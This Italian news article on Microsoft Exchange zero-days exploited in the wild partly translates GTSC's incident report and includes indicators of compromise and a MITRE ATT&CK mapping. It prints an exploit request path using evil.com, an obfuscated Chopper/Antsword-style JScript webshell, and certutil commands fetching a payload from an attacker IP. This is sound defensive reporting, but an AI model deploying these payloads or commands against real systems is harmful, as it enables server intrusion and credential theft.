Red Hot Cyber

Sicurezza informatica, cybercrime, hack
news, e altro ancora
  • English

Nuovi zero-day di Microsoft Exchange sfruttati in attacchi attivi

I cybercriminali stanno sfruttando bug zero-day di Microsoft Exchange che consentono l’esecuzione di codice in modalità remota, secondo le affermazioni fatte dai ricercatori di sicurezza dell’azienda vietnamita di sicurezza informatica GTSC, che per prima ha individuato e segnalato gli attacchi.

Gli aggressori stanno concatenando la coppia di zero-day per distribuire le webshell Chopper di origine cinese su server compromessi per acquisire persistenza finalizzata al furto di dati, oltre a spostarsi lateralmente su altri sistemi sulle reti delle vittime.

Advertisements

Intorno all’inizio di agosto 2022, il SOC dell’azienda GTSC ha scoperto che un’infrastruttura critica veniva attaccata, in particolare sulla propria applicazione Microsoft Exchange. 

Durante l’indagine, gli esperti del Blue Team di GTSC hanno stabilito che l’attacco utilizzava una vulnerabilità di sicurezza di Exchange non pubblicata, ovvero una vulnerabilità di 0day, quindi hanno immediatamente elaborato un piano di contenimento temporaneo. 

Advertisements

Allo stesso tempo, gli esperti di Red Team dell’azienda hanno iniziato la ricerca e il debug del codice decompilato di Exchange per trovare la vulnerabilità e sfruttare il codice. Grazie all’esperienza sui bug precedenti di Microsoft Exchange, i tempi di ricerca si sono stati ridotti e la vulnerabilità è stata scoperta rapidamente. 

La vulnerabilità risulta essere così critica da consentire all’attaccante di eseguire RCE sul sistema compromesso. GTSC ha immediatamente presentato la vulnerabilità alla Zero Day Initiative (ZDI) per collaborare con Microsoft in modo da poter preparare una patch il prima possibile. 

ZDI ha verificato e riconosciuto 2 bug, i cui punteggi CVSS sono 8,8 e 6,3, relativi all’exploit come segue.

Tuttavia, fino ad ora, GTSC ha visto anche altri clienti riscontrare il problema. 

Advertisements

Dopo accurati test, è stato confermato che quei sistemi venivano attaccati utilizzando questa vulnerabilità 0day. Per aiutare la comunità a fermare temporaneamente l’attacco prima di una patch ufficiale di Microsoft, l’azienda ha pubblicato un articolo (che abbiamo parzialmente tradotto) rivolto a quelle organizzazioni che utilizzano il sistema di posta elettronica Microsoft Exchange.

Informazioni sulla vulnerabilità

Durante la fornitura del servizio SOC a un cliente di GTSC, il Blueteam ha rilevato richieste di exploit nei registri IIS con lo stesso formato della vulnerabilità di ProxyShell: 

autodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com

Controllando anche altri log, i ricercatori hanno visto che l’attaccante può eseguire comandi sul sistema attaccato. Il numero di versione di questi server Exchange mostrava che l’ultimo aggiornamento era già installato, quindi lo sfruttamento non era relativo alla vulnerabilità di Proxyshell in quanto la fix era stata installata.

Advertisements

Attività post-exploit

Gli hacker malintenzionati hanno utilizzato varie tecniche per creare backdoor sul sistema interessato ed eseguire movimenti laterali verso altri server nel sistema.

Webshell

E’ stata rilevata una webshell, per lo più offuscate, rilasciate sui server Exchange. Utilizzando lo user-agent, è stato possibile comprendere che l’attaccante utilizza Antsword, uno strumento attivo di amministrazione di siti Web multipiattaforma opensource con sede in cinese che supporta la gestione di webshell.

<%@Page Language="Jscript"%>

<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('NTcyM'+'jk3O3'+'ZhciB'+'zYWZl'+''+'P'+'S'+char(837-763)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MQ=='))+char(51450/525)+''+''+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Wg=='))+'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+'WFtRG'+'Z6bU8'+'xajhk'+'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+'')));%>

SI sospetta che provengano da un gruppo di attacco cinese perché la codepage della webshell è 936, che è una codifica dei caratteri Microsoft per il cinese semplificato.

Advertisements

Un’altra caratteristica degna di nota è che l’hacker modifica anche il contenuto del file RedirSuiteServiceProxy.aspx in webshell. 

RedirSuiteServiceProxy.aspx è un nome file legittimo disponibile nel server Exchange.

Nome del fileSentiero
RedirSuiteServiceProxy.aspxC:\Programmi\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth
XML.ashxC:\inetpub\wwwroot\aspnet_client
pxh4HG1v.ashxC:\Programmi\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth

Durante il processo di risposta agli incidenti presso un altro cliente, GTSC ha notato che il team di attacco ha utilizzato un altro modello di webshell

  • Nome file : errorEE.aspx
  • SHA256 : be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257
  • Rif : https://github.com/antonioCoco/SharPyShell

Esecuzione del comando

Advertisements

Oltre a raccogliere informazioni sul sistema, l’attaccante scarica i file e controlla le connessioni tramite certutil, che è uno strumento legittimo disponibile in ambiente Windows.

“cmd” /c cd /d "c:\\PerfLogs"&certutil.exe -urlcache -split -f http://206.188.196.77:8080/themes.aspx c:\perflogs\t&echo [S]&cd&echo [E]

"cmd" /c cd /d "c:\\PerfLogs"&certutil.exe -urlcache -split -f https://httpbin.org/get c:\test&echo [S]&cd&echo [E]

Va notato che ogni comando termina con la stringa echo [S]&cd&echo [E] , che è una delle firme del cinese Chopper.

Inoltre, l’hacker inserisce nella memoria delle DLL dannose, rilascia file sospetti sui server attaccati ed esegue questi file tramite WMIC.

File sospetto

Advertisements

Sui server, sono stati rilevati file sospetti di formati exe e dll

Nome del fileSentiero
DrSDKCaller.exeC:\root\DrSDKCaller.exe
all.exeC:\Utenti\Pubblico\all.exe
dump.dllC:\Utenti\Pubblico\dump.dll
ad.exeC:\Utenti\Pubblico\ad.exe
gpg-error.exeC:\PerfLogs\gpg-error.exe
cm.exeC:\PerfLogs\cm.exe
msado32.tlbC:\Programmi\File comuni\sistema\ado\msado32.tlb

Tra i file sospetti, in base ai comandi eseguiti sul server, è stato determinato che all.exe  e dump.dll sono responsabili del dump delle credenziali sul sistema server. 

Successivamente, l’attaccante utilizza rar.exe per comprimere i file scaricati e copiarli nella webroot del server Exchange. Sfortunatamente, durante il processo di risposta, i file di cui sopra non esistono più sul sistema compromesso, probabilmente a causa dell’eliminazione delle prove da parte dell’hacker. 

Il file cm.exe che viene rilasciato nella cartella C:\PerfLogs\ è lo strumento standard della riga di comando di Windows cmd.exe .

Advertisements

Indicatori di compromissione

Webshell:

File Name: pxh4HG1v.ashx
Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1                Path: C:\ProgramFiles\Microsoft\ExchangeServer\V15\FrontEnd\HttpProxy\owa\auth\pxh4HG1v.ashx

File Name: RedirSuiteServiceProxy.aspx
Hash (SHA256): 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5
Path: C:\ProgramFiles\Microsoft\ExchangeServer\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx

File Name: RedirSuiteServiceProxy.aspx
Hash (SHA256): b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca
Path: C:\ProgramFiles\Microsoft\ExchangeServer\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx

Advertisements

File Name: Xml.ashx
Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1 Path: Xml.ashx

Filename: errorEE.aspx
SHA256: be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257
Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorEE.aspx

DLL:

File name: Dll.dll

Advertisements

SHA256:

074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82			45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9			9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0			29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3			c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2

File name: 180000000.dll (Dump từ tiến trình Svchost.exe)

SHA256: 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e

IP:

Advertisements
  • 125[.]212[.]220[.]48
  • 5[.]180[.]61[.]17
  • 47[.]242[.]39[.]92
  • 61[.]244[.]94[.]85
  • 86[.]48[.]6[.]69
  • 86[.]48[.]12[.]64
  • 94[.]140[.]8[.]48
  • 94[.]140[.]8[.]113
  • 103[.]9[.]76[.]208
  • 103[.]9[.]76[.]211
  • 104[.]244[.]79[.]6
  • 112[.]118[.]48[.]186
  • 122[.]155[.]174[.]188
  • 125[.]212[.]241[.]134
  • 185[.]220[.]101[.]182
  • 194[.]150[.]167[.]88
  • 212[.]119[.]34[.]11

URL:

hxxp://206[.]188[.]196[.]77:8080/themes.aspx

C2:

137[.]184[.]67[.]33

Advertisements

Mitre ATT&CK Mapping

TaticIDName
Resource DevelopmentT1586.002Compromise Accounts: Email Accounts
ExecutionT1059.003Command and Scripting Interpreter: Windows Command Shell
ExecutionT1047Windows Management Instrumentation
PersistenceT1505.003Server Software Component: Web Shell
Defense EvasionT1070.004Indicator Removal on Host: File Deletion
Defense EvasionT1036.005Masquerading: Match Legitimate Name or Location
Defense EvasionT1620Reflective Code Loading
Credential AccessT1003.001OS Credential Dumping: LSASS Memory
DiscoveryT1087Account Discovery
DiscoveryT1083File and Directory Discovery
DiscoveryT1057Process Discovery
DiscoveryT1049System Network Connections Discovery
Lateral MovementT1570Lateral Tool Transfer
CollectionT1560.001Archive Collected Data: Archive via Utility